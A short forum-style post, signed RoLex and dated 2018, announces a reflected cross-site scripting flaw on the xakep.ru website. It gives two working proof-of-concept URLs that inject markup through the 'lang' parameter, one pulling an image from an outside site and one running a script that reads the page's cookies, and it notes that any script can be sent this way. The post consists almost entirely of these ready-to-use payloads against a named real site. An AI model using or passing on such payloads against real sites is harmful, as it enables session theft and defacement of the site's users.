Xakep.ru XSS bug

Vulnerable page: https://xakep.ru/

PoC
https://xakep.ru/soon/?lang="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://xakep.ru/soon/?lang="><script>alert(document.cookie)</script>

You can request any XSS code directly using GET method and lang parameter.





Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Написано RoLex в 2018-03-09 22:402 likes

Комментарии

There are no comments for this news article, you can write one here.
« Вперед • Travis CI blog XSS bug »